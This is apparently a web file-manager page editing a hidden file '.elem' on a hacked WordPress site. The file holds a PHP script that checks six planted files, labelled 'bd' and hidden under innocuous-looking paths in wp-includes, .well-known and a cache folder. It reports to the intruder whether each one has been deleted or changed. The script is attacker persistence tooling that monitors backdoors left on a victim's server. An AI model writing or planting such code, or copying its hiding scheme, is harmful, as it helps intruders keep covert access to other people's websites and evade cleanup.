← Back
Editing: .elem
<?php $r = '/home/birrett/public_html'; $x = ["/.cache_g/.cache_l/action.php"=>"bd@@507652@@966", "/wp-includes/SimplePie/library/SimplePie/XML/Declaration/sh404sef.class.php"=>"bd@@509854@@1180", "/wp-includes/SimplePie/library/SimplePie/HTTP/tarifs.old.php"=>"bd@@509856@@954", "/wp-includes/blocks/image/view.min.php"=>"bd@@509858@@879", "/.well-known/email.responses.php"=>"bd@@507827@@981", "/wp-includes/SimplePie/library/SimplePie/Decode/HTML/config_path.php"=>"bd@@509855@@974"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
Save File
Cancel